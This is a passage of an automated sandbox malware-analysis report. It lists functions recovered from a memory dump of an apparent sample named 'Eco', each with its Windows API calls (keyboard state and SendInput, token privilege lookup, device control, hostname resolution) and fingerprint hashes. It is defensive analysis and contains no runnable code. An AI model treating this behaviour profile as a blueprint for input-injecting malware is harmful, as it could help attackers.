                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                          • Instruction ID: 1ad1635344b08d8c667f07ac31c96dd8a799e76f2e1fd4bbfa823d3049152d21
                          • Opcode Fuzzy Hash: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                          • Instruction Fuzzy Hash: 8E315934A50A189EFF30CA2EAC087FD7FA9BB45310F08C21AF588D61D2C3748955B769
                          Function 0057127C Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 005712D1
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 005712ED
                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0057134C
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0057139E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                          • Instruction ID: 3599e32e227c7bcfec95b53dc7a895c91acce0bb8f876b1208f5693626377e58
                          • Opcode Fuzzy Hash: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                          • Instruction Fuzzy Hash: 07314C30D40A089EFF348A6DAC08BFE7FA9BF85310F18CA1AF498465D1C3748959B759
                          Function 00546325 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0054635B
                          • __isleadbyte_l.LIBCMT ref: 00546389
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005463B7
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005463ED
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 1223ae78bf0454002d0c1e96b8058243ded96362ea82143d2101bdc3034d492b
                          • Instruction ID: 3c05d4b456761bdaf2d2ae85b8e2203eeb01fbc09e29f56faf467c972215e580
                          • Opcode Fuzzy Hash: 1223ae78bf0454002d0c1e96b8058243ded96362ea82143d2101bdc3034d492b
                          • Instruction Fuzzy Hash: B031AE31600296AFDF258F25C888BEA7FB5FF42318F154928F8248B191D731D850DB92
                          Function 005952F3 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 00595307
                            • Part of subcall function 005739A1: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005739BB
                            • Part of subcall function 005739A1: GetCurrentThreadId.KERNEL32 ref: 005739C2
                            • Part of subcall function 005739A1: AttachThreadInput.USER32(00000000,?,0057542D), ref: 005739C9
                          • GetCaretPos.USER32(?), ref: 00595318
                          • ClientToScreen.USER32(00000000,?), ref: 00595353
                          • GetForegroundWindow.USER32 ref: 00595359
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: 7ee07b0d6cf5e6afb9b4c9d10885523c011d28e20d21ece800cb9969a0bf8ac1
                          • Instruction ID: 863c33d5d0375ce963761fd59fc0614fc59e6db323c8696628f32e9fbccb8249
                          • Opcode Fuzzy Hash: 7ee07b0d6cf5e6afb9b4c9d10885523c011d28e20d21ece800cb9969a0bf8ac1
                          • Instruction Fuzzy Hash: AF314DB1D00109AFDB00EFA5D8859EFBBF9FF99300F10446AE415E7241EA71AE458FA1
                          Function 0059C8BB Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetCursorPos.USER32(?), ref: 0059C8F5
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0054BC1C,?,?,?,?,?), ref: 0059C90A
                          • GetCursorPos.USER32(?), ref: 0059C957
                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0054BC1C,?,?,?), ref: 0059C991
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                          • String ID:
                          • API String ID: 2864067406-0
                          • Opcode ID: c1bc74600c9c3887927ec2d2db5e4007108724330e6731ee4cc2968d1313cacb
                          • Instruction ID: 248e0050d408a9278f54eed031a997e0b0c3a693dbbe3104f20b2440d9ddf43a
                          • Opcode Fuzzy Hash: c1bc74600c9c3887927ec2d2db5e4007108724330e6731ee4cc2968d1313cacb
                          • Instruction Fuzzy Hash: A5316D35601118AFCF259F58C858EEA7FB5FB4F310F04415AF9498B2A1C731A951EFA0
                          Function 00530AEB Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                          • __setmode.LIBCMT ref: 00530B0D
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577CBE,?,?,00000000), ref: 00524041
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577CBE,?,?,00000000,?,?), ref: 00524065
                          • _fprintf.LIBCMT ref: 00530B44
                          • OutputDebugStringW.KERNEL32(?), ref: 0056672F
                            • Part of subcall function 00534BFA: _flsall.LIBCMT ref: 00534C13
                          • __setmode.LIBCMT ref: 00530B79
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                          • String ID:
                          • API String ID: 521402451-0
                          • Opcode ID: 995952ad64ea20fd149a2fd51395b63e364052691167b575b5545c7259de30f1
                          • Instruction ID: 9a8879a8555434b442ebc9e70b82b104b77969593d2cc27065e23f61e8b08297
                          • Opcode Fuzzy Hash: 995952ad64ea20fd149a2fd51395b63e364052691167b575b5545c7259de30f1
                          • Instruction Fuzzy Hash: A91124729042067ADB14B7A8AC5FDBEBF68FFC2320F144156F204971C2DE706D469BA5
                          Function 00569057 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00568B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568B22
                            • Part of subcall function 00568B0B: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00568B2C
                            • Part of subcall function 00568B0B: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B3B
                            • Part of subcall function 00568B0B: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B42
                            • Part of subcall function 00568B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B58
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005690A4
                          • _memcmp.LIBCMT ref: 005690C7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005690FD
                          • HeapFree.KERNEL32(00000000), ref: 00569104
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                          • String ID:
                          • API String ID: 1592001646-0
                          • Opcode ID: 5c2d452377560deca776a22750dccf485690509a70b9b32baf3bd68bdc9e2de1
                          • Instruction ID: 3d7195e9cdae0ae21563008158aaf7c944f80df4437ea92cbde1a2371ae3f309
                          • Opcode Fuzzy Hash: 5c2d452377560deca776a22750dccf485690509a70b9b32baf3bd68bdc9e2de1
                          • Instruction Fuzzy Hash: A9219071E40109EFDB10DFA5C989BEEBBB8FF44321F144059E845A7241E731AB05DB50
                          Function 00596116 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00596185
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0059619F
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005961AD
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005961BB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 58ddcd9b3d6561c4a2d7cfe65248b98033ae9fadb7ca325f64a6c75ebabaea41
                          • Instruction ID: e99bb7b426271a35ef9d8ab80df6b0ded3927c59e2c9e1dae7c987be955667bf
                          • Opcode Fuzzy Hash: 58ddcd9b3d6561c4a2d7cfe65248b98033ae9fadb7ca325f64a6c75ebabaea41
                          • Instruction Fuzzy Hash: 8711D035340515AFEB04AB14DC49FBA7BA9FF8A320F044108F816CB2D2DB74AD44DB91
                          Function 0056E23D Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0056F63B: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0056E252,?,?,?,0056F045,00000000,000000EF,00000119,?,?), ref: 0056F64A
                            • Part of subcall function 0056F63B: lstrcpyW.KERNEL32(00000000,?), ref: 0056F670
                            • Part of subcall function 0056F63B: lstrcmpiW.KERNEL32(00000000,?,0056E252,?,?,?,0056F045,00000000,000000EF,00000119,?,?), ref: 0056F6A1
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0056F045,00000000,000000EF,00000119,?,?,00000000), ref: 0056E26B
                          • lstrcpyW.KERNEL32(00000000,?), ref: 0056E291
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0056F045,00000000,000000EF,00000119,?,?,00000000), ref: 0056E2C5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: 245a8e406fb8c57f148c30116d6d57b3fe60708d428aeca2442fb245565733f2
                          • Instruction ID: efa57af82a0414833b1405760010c5c8d7a9be00743d50f7253c7d261cd4c0e3
                          • Opcode Fuzzy Hash: 245a8e406fb8c57f148c30116d6d57b3fe60708d428aeca2442fb245565733f2
                          • Instruction Fuzzy Hash: D511903A201305AFDB259F64DC5ADBA7BA9FF85350B40512AF806CB2A0EB719851D790
                          Function 00545242 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00545261
                            • Part of subcall function 0053586C: __FF_MSGBANNER.LIBCMT ref: 00535883
                            • Part of subcall function 0053586C: __NMSG_WRITE.LIBCMT ref: 0053588A
                            • Part of subcall function 0053586C: RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,00000004,?,?,00530F33,?), ref: 005358AF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 56019c1ae0e7ff29b0c26936016668aeb70534ea7497982ccc82189b52f1d6ca
                          • Instruction ID: 8243882767000d82f2675b1a18356c0f197533e70d93c5719c0eede7733d6ad0
                          • Opcode Fuzzy Hash: 56019c1ae0e7ff29b0c26936016668aeb70534ea7497982ccc82189b52f1d6ca
                          • Instruction Fuzzy Hash: 4611063690AB16ABCF213F74AC096AF3F98BF61364F104827F9059A192EE708D409794
                          Function 005741D2 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005741F2
                          • _memset.LIBCMT ref: 00574213
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00574265
                          • CloseHandle.KERNEL32(00000000), ref: 0057426E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          • Opcode ID: bea9dc968fbf7ebf9f1184ee110d3c832636d69d24603047574a77d03c02b78b
                          • Instruction ID: 31354d8b5aeb3b9fc079fd5b39f888b9a75b496e6904d9af913bf22ebd49faf0
                          • Opcode Fuzzy Hash: bea9dc968fbf7ebf9f1184ee110d3c832636d69d24603047574a77d03c02b78b
                          • Instruction Fuzzy Hash: BE11E7759022287AD7309BA5AC4DFEBBB7CEF45720F00429AF908E71D0D2744E80CBA4
                          Function 00586819 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577CBE,?,?,00000000), ref: 00524041
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577CBE,?,?,00000000,?,?), ref: 00524065
                          • gethostbyname.WSOCK32(?,?,?), ref: 00586849
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586854
                          • _memmove.LIBCMT ref: 00586881
                          • inet_ntoa.WSOCK32(?), ref: 0058688C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                          • String ID:
                          • API String ID: 1504782959-0
                          • Opcode ID: 198525e047d6ce3ef75cbdcc71f05f46e200cc5e9ca53527206dcc1553be0395
                          • Instruction ID: 35369f40c1982b36ec6c29368c65ad4ed837b735ed7b152fd04296866d9d1464
                          • Opcode Fuzzy Hash: 198525e047d6ce3ef75cbdcc71f05f46e200cc5e9ca53527206dcc1553be0395
                          • Instruction Fuzzy Hash: 5E114F7650010AAFCB00FBA4D94ACEEBBB8FF55310B544065F505B72A1DF30AE44DB91
                          Function 005694DC Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 005694FC
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056950E
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00569524
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056953F
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 9b238afd167026f4c3c645871f935d274e502f70eb853acbf015ea926ae88342
                          • Instruction ID: 59f92b1e65d239b8c0df6fa48c95aba3a3115d1c93ca5bd8ef44d537481d3f9c
                          • Opcode Fuzzy Hash: 9b238afd167026f4c3c645871f935d274e502f70eb853acbf015ea926ae88342
                          • Instruction Fuzzy Hash: D7114879900218FFEB11DFA9C884EADBBB8FF48710F204095EA01B7290D671AE11DB90
                          Function 0051166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
                          • GetClientRect.USER32(?,?), ref: 0054B86C
                          • GetCursorPos.USER32(?), ref: 0054B876
                          • ScreenToClient.USER32(?,?), ref: 0054B881
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Client$CursorLongProcRectScreenWindow
                          • String ID:
                          • API String ID: 4127811313-0
                          • Opcode ID: 792c056d870fc31e6f96bb6a5402734d978682aaf838f8265182e8c1d27e7866
                          • Instruction ID: 6d0df52389df7aa1c5f5bf5d7bf0fea833c911dcf7a4908b5d0422f7e433a077
                          • Opcode Fuzzy Hash: 792c056d870fc31e6f96bb6a5402734d978682aaf838f8265182e8c1d27e7866
                          • Instruction Fuzzy Hash: E3115835A0041AAFEB10EF58C8899FE7BB8FB45301F000496FA02EB550C731BA95DBA5
                          Function 00512111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                          • GetStockObject.GDI32(00000011), ref: 00512163
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: 0c869c3c321db55cc8818d83b6b336ffbb1ccfd5bea958cf362a2dadba8f4885
                          • Instruction ID: 337581a6cf207a8f9e5e87e5d7c6fdca917ca9ee773c7e78303407e8b343734c
                          • Opcode Fuzzy Hash: 0c869c3c321db55cc8818d83b6b336ffbb1ccfd5bea958cf362a2dadba8f4885
                          • Instruction Fuzzy Hash: 6B116D72541549BFEF129F90DC45EEA7FA9FF69354F040116FA0452160D731DCA1EBA0
                          Function 005717AD Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717CA
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717EF
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717F9
                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 0057182C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
